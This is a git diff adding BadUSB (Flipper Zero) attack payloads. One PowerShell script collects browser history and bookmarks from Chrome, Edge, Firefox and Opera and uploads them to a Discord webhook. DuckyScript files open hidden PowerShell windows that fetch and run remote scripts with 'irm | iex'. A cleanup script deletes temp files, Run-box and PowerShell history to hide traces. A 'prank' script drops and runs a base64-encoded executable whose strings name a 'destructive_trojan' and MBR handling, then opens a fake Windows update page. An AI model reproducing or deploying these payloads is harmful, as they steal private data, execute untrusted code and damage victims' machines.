+
+SYNOPSIS
+
+Gathers History and Bookmarks data from database files and sends it to discord
+
+USAGE
+
+1. Replace YOUR_WEBHOOK_HERE with your Discord webhook.
+2. Run the script and check Discord for results.
\ No newline at end of file
diff --git a/Browser-History-to-Discord/main.ps1 b/Browser-History-to-Discord/main.ps1
new file mode 100644
index 0000000..b8cbd6a
--- /dev/null
+++ b/Browser-History-to-Discord/main.ps1
@@ -0,0 +1,44 @@
+
+$whuri = "$dc"
+
+$outpath = "$env:temp\history.txt"
+"Browser History `n -----------------------------------------------------------------------" | Out-File -FilePath $outpath -Encoding ASCII
+
+# Define the Regular expression for extracting history and bookmarks
+$Regex = '(http|https)://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?'
+
+# Define paths for data storage
+$Paths = @{
+ 'chrome_history' = "$Env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\History"
+ 'chrome_bookmarks' = "$Env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Bookmarks"
+ 'edge_history' = "$Env:USERPROFILE\AppData\Local\Microsoft/Edge/User Data/Default/History"
+ 'edge_bookmarks' = "$env:USERPROFILE\AppData\Local\Microsoft\Edge\User Data\Default\Bookmarks"
+ 'firefox_history' = "$Env:USERPROFILE\AppData\Roaming\Mozilla\Firefox\Profiles\*.default-release\places.sqlite"
+ 'opera_history' = "$Env:USERPROFILE\AppData\Roaming\Opera Software\Opera GX Stable\History"
+ 'opera_bookmarks' = "$Env:USERPROFILE\AppData\Roaming\Opera Software\Opera GX Stable\Bookmarks"
+}
+
+# Define browsers and data
+$Browsers = @('chrome', 'edge', 'firefox', 'opera')
+$DataValues = @('history', 'bookmarks')
+
+foreach ($Browser in $Browsers) {
+ foreach ($DataValue in $DataValues) {
+ $PathKey = "${Browser}_${DataValue}"
+ $Path = $Paths[$PathKey]
+
+ $Value = Get-Content -Path $Path | Select-String -AllMatches $regex | % {($_.Matches).Value} | Sort -Unique
+
+ $Value | ForEach-Object {
+ [PSCustomObject]@{
+ Browser = $Browser
+ DataType = $DataValue
+ Content = $_
+ }
+ } | Out-File -FilePath $outpath -Append
+ }
+}
+
+curl.exe -F file1=@"$outPath" $whuri | Out-Null
+sleep 2
+Remove-Item -Path $outPath -force
diff --git a/Clean-History/Clean-History.txt b/Clean-History/Clean-History.txt
new file mode 100644
index 0000000..e043e19
--- /dev/null
+++ b/Clean-History/Clean-History.txt
@@ -0,0 +1,19 @@
+REM Title: History Cleaner
+REM Author: @beigeworm
+REM Description: This script empties the temp folder and recycle bin, clear run box and powershell history
+REM Target: Windows 10
+
+REM *SETUP*
+REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook.
+
+REM some setup for dukie script
+DEFAULT_DELAY 100
+
+REM open powershell (remove "-W H" to show the window)
+DELAY 1000
+GUI r
+DELAY 750
+STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Clean-History/main.ps1 | iex
+ENTER
+
+
diff --git a/Clean-History/README.md b/Clean-History/README.md
new file mode 100644
index 0000000..9d89c58
--- /dev/null
+++ b/Clean-History/README.md
@@ -0,0 +1,13 @@
+
+
History Cleaner
+
+SYNOPSIS
+Empty the temp folder and recycle bin, clear run box and powershell history.
+
+USAGE
+1. Run the script
+
+CREDIT
+this code was pulled from I-Am-Jakoby's recon script.
+
+#>
diff --git a/Clean-History/main.ps1 b/Clean-History/main.ps1
new file mode 100644
index 0000000..db2815a
--- /dev/null
+++ b/Clean-History/main.ps1
@@ -0,0 +1,15 @@
+# Delete contents of Temp folder
+
+rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
+
+# Delete run box history
+
+reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
+
+# Delete powershell history
+
+Remove-Item (Get-PSreadlineOption).HistorySavePath
+
+# Deletes contents of recycle bin
+
+Clear-RecycleBin -Force -ErrorAction SilentlyContinue
\ No newline at end of file
diff --git a/Computer-Acid/Computer-ACID-Prank.txt b/Computer-Acid/Computer-ACID-Prank.txt
new file mode 100644
index 0000000..6587f9a
--- /dev/null
+++ b/Computer-Acid/Computer-ACID-Prank.txt
@@ -0,0 +1,16 @@
+REM Title: beigeworm's GDI Effects Prank.
+REM Author: @beigeworm
+REM Description: This script uses GDI effects on the users display to create visual effects for 90 seconds.
+REM Target: Windows 10
+
+REM some setup for dukie script
+DEFAULT_DELAY 100
+
+REM open powershell (remove "-W H" to show the window)
+DELAY 1000
+GUI r
+DELAY 750
+STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Computer-Acid/main.ps1 | iex
+ENTER
+
+
diff --git a/Computer-Acid/README.md b/Computer-Acid/README.md
new file mode 100644
index 0000000..63951a8
--- /dev/null
+++ b/Computer-Acid/README.md
@@ -0,0 +1,11 @@
+
+
Computer Acid Prank
+
+SYNOPSIS
+
+this script generates GDI effects (VISUAL EFFECTS) on the desktop
+(lasts for 90 seconds before returning to normal)
+
+USAGE
+
+1. Run script with powershell
\ No newline at end of file
diff --git a/Computer-Acid/main.ps1 b/Computer-Acid/main.ps1
new file mode 100644
index 0000000..22f73ac
--- /dev/null
+++ b/Computer-Acid/main.ps1
@@ -0,0 +1,49 @@
+
+<#
+====================== Beigeworm's GDI Effects Tool ==========================
+
+SYNOPSIS
+this script generates GDI effects (VISUAL EFFECTS) on the desktop
+(lasts for 90 seconds before returning to normal)
+
+USAGE
+1. Run script with powershell
+#>
+
+Function SoundSpam{
+(New-Object Media.SoundPlayer "C:\WINDOWS\Media\tada.wav").Play();
+}
+SoundSpam
+
+# Mouse
+$b64 = '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AAAAAAAArgBDBAAAAAAEAAAAAAAAAAAAAAClAPAGAAAAAAQAAgAFAAIABgACAAcAAwAAAABfX1N0YXRpY0FycmF5SW5pdFR5cGVTaXplPTIwAENsYXNzMQBrZXJuZWwzMgBVSW50MzIAPE1vZHVsZT4APFByaXZhdGVJbXBsZW1lbnRhdGlvbkRldGFpbHM+AEFDX1NSQ19BTFBIQQA2MTQzOEIyODg5MTAwNjAxNjExQjREM0FGMEYyRTBEQTMyNTE3QkYxMzc2MkNCNDA1NjFGQzY5Q0ZGMTE1MkZCAENyZWF0ZUNvbXBhdGlibGVEQwBSZWxlYXNlREMARGVsZXRlREMAR2V0REMAR2V0V2luZG93REMAU1JDQU5EAE5PVFNSQ0VSQVNFAEJMRU5ERlVOQ1RJT04AQUNfU1JDX09WRVIAV0hJVEVORVNTAEJMQUNLTkVTUwBDQVBUVVJFQkxUAFNSQ1BBSU5UAE1FUkdFUEFJTlQAUEFUUEFJTlQAUE9JTlQAU1JDSU5WRVJUAFBBVElOVkVSVABEU1RJTlZFUlQARXh0cmFjdEljb25FeFcAZ2V0X1gATk9UU1JDQ09QWQBNRVJHRUNPUFkAUEFUQ09QWQBnZXRfWQB2YWx1ZV9fAFNvdXJjZUNvbnN0YW50QWxwaGEAYWxwaGEAbXNjb3JsaWIARnJvbUhkYwBoZGMAblhTcmMAbllTcmMAaGRjU3JjAG5XaWR0aFNyYwBuWE9yaWdpblNyYwBuWU9yaWdpblNyYwBuSGVpZ2h0U3JjAEdlbmVyaWNSZWFkAEZpbGVTaGFyZVJlYWQAVGhyZWFkAGxwT3ZlcmxhcHBlZABoV25kAEdkaUFscGhhQmxlbmQAaHduZABkd1NoYXJlTW9kZQBJRGlzcG9zYWJsZQBSdW50aW1lRmllbGRIYW5kbGUAQ2xvc2VIYW5kbGUAaEhhbmRsZQBGcm9tSGFuZGxlAFJlY3RhbmdsZQBDcmVhdGVGaWxlAGhUZW1wbGF0ZUZpbGUAV3JpdGVGaWxlAGhGaWxlAHNGaWxlAGZpbGUAbHBGaWxlTmFtZQBEYXRlVGltZQBWYWx1ZVR5cGUAYkVyYXNlAEZpbGVGbGFnRGVsZXRlT25DbG9zZQBEaXNwb3NlAEdlbmVyaWNXcml0ZQBGaWxlU2hhcmVXcml0ZQBuTnVtYmVyT2ZCeXRlc1RvV3JpdGUAQ29tcGlsZXJHZW5lcmF0ZWRBdHRyaWJ1dGUARGVidWdnYWJsZUF0dHJpYnV0ZQBUYXJnZXRGcmFtZXdvcmtBdHRyaWJ1dGUAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBHZW5lcmljRXhlY3V0ZQBnZGl0ZXN0LmV4ZQBNYnJTaXplAFN5c3RlbS5UaHJlYWRpbmcAU3lzdGVtLlJ1bnRpbWUuVmVyc2lvbmluZwBPcGVuRXhpc3RpbmcAU3lzdGVtLkRyYXdpbmcAQ3JlYXRlU29saWRCcnVzaABnZXRfV2lkdGgAbldpZHRoAHByb2Nlc3NJbmZvcm1hdGlvbkxlbmd0aABoZ2Rpb2JqAGhibU1hc2sAeE1hc2sAeU1hc2sAR2VuZXJpY0FsbABnZGkzMi5kbGwAa2VybmVsMzIuZGxsAFNoZWxsMzIuZGxsAFVzZXIzMi5kbGwAdXNlcjMyLmRsbABudGRsbC5kbGwAU3lzdGVtAFJhbmRvbQBnZXRfQm90dG9tAEVudW0Ab3BfTGVzc1RoYW4AZGVzdHJ1Y3RpdmVfdHJvamFuAFRpbWVTcGFuAGdldF9QcmltYXJ5U2NyZWVuAGxwTnVtYmVyT2ZCeXRlc1dyaXR0ZW4ATWFpbgBsYXJnZUljb24ARHJhd0ljb24AcGlMYXJnZVZlcnNpb24AcGlTbWFsbFZlcnNpb24AcHJvY2Vzc0luZm9ybWF0aW9uAG9wX1N1YnRyYWN0aW9uAGJsZW5kRnVuY3Rpb24AZ2V0X1Bvc2l0aW9uAGR3Q3JlYXRpb25EaXNwb3NpdGlvbgBaZXJvAEJsZW5kT3AAQ3JlYXRlQ29tcGF0aWJsZUJpdG1hcABTbGVlcABkd1JvcABnZXRfVG9wAG51bWJlcgBscEJ1ZmZlcgBjckNvbG9yAEN1cnNvcgAuY3RvcgBJbnRQdHIAR3JhcGhpY3MAU3lzdGVtLkRpYWdub3N0aWNzAEZyb21TZWNvbmRzAGdldF9Cb3VuZHMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBEZWJ1Z2dpbmdNb2RlcwBkd0ZsYWdzQW5kQXR0cmlidXRlcwBscFNlY3VyaXR5QXR0cmlidXRlcwBCbGVuZEZsYWdzAGZsYWdzAFN5c3RlbS5XaW5kb3dzLkZvcm1zAGFtb3VudEljb25zAFRlcm5hcnlSYXN0ZXJPcGVyYXRpb25zAFJ1bnRpbWVIZWxwZXJzAHByb2Nlc3NJbmZvcm1hdGlvbkNsYXNzAGR3RGVzaXJlZEFjY2VzcwBoUHJvY2VzcwBOdFNldEluZm9ybWF0aW9uUHJvY2VzcwBBbHBoYUZvcm1hdABmb3JtYXQARXh0cmFjdABJbnZhbGlkYXRlUmVjdABuQm90dG9tUmVjdABscFJlY3QAblRvcFJlY3QAbkxlZnRSZWN0AG5SaWdodFJlY3QARGVsZXRlT2JqZWN0AGhPYmplY3QAU2VsZWN0T2JqZWN0AG5YTGVmdABuWUxlZnQAZ2V0X0xlZnQAZ2V0X1JpZ2h0AGdldF9IZWlnaHQAbkhlaWdodABvcF9JbXBsaWNpdABQbGdCbHQAU3RyZXRjaEJsdABQYXRCbHQAQml0Qmx0AGxwUG9pbnQAblhEZXN0AG5ZRGVzdABoZGNEZXN0AG5XaWR0aERlc3QAblhPcmlnaW5EZXN0AG5ZT3JpZ2luRGVzdABuSGVpZ2h0RGVzdABnZGl0ZXN0AGdldF9Ob3cAR2V0RGVza3RvcFdpbmRvdwBFeHRyYWN0SWNvbkV4AGlJbmRleABJbml0aWFsaXplQXJyYXkAAAAXcwBoAGUAbABsADMAMgAuAGQAbABsAAAAAAC0p8wLFuq5ToALK4n7m0//AAQgAQEIAyAAAQUgAQEREQQgAQEOBgcDGBgSHQUAARIdGCUHGREhESUSKQgICAgICB0JHREUEh0RLRgYGBgYGBgICBExEjUCBAABAQgEAAARIQUAARElDQQAABJJBCAAES0DIAAIBwACARJVEVkCBhgEAAARMQUAARI1GAcgAwESHQgICAACESURIREhBwACAhElESUEBwERMQUgAgEICAQHAREUCLd6XFYZNOCJCLA/X38R1Qo6BAAAAIAEAAAAQAQAAAAgBAAAABAEAQAAAAQCAAAABAMAAAAEAAAABAQAAgAABAAAAAAEIADMAASGAO4ABMYAiAAERgBmAAQoA0QABAgAMwAEpgARAATKAMAABCYCuwAEIQDwAAQJCvsABEkAWgAECQBVAARCAAAABGIA/wABAgIG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'
+$decodedFile = [System.Convert]::FromBase64String($b64)
+$File2 = "$env:temp/GDI2"+".exe"
+Set-Content -Path $File2 -Value $decodedFile -Encoding Byte
+& $File2
+
+SoundSpam
+Sleep 2
+cmd.exe ("/c taskkill /F /IM chrome.exe & start chrome.exe -kiosk https://fakeupdate.net/win8 & exit")
+sleep 2
+# message
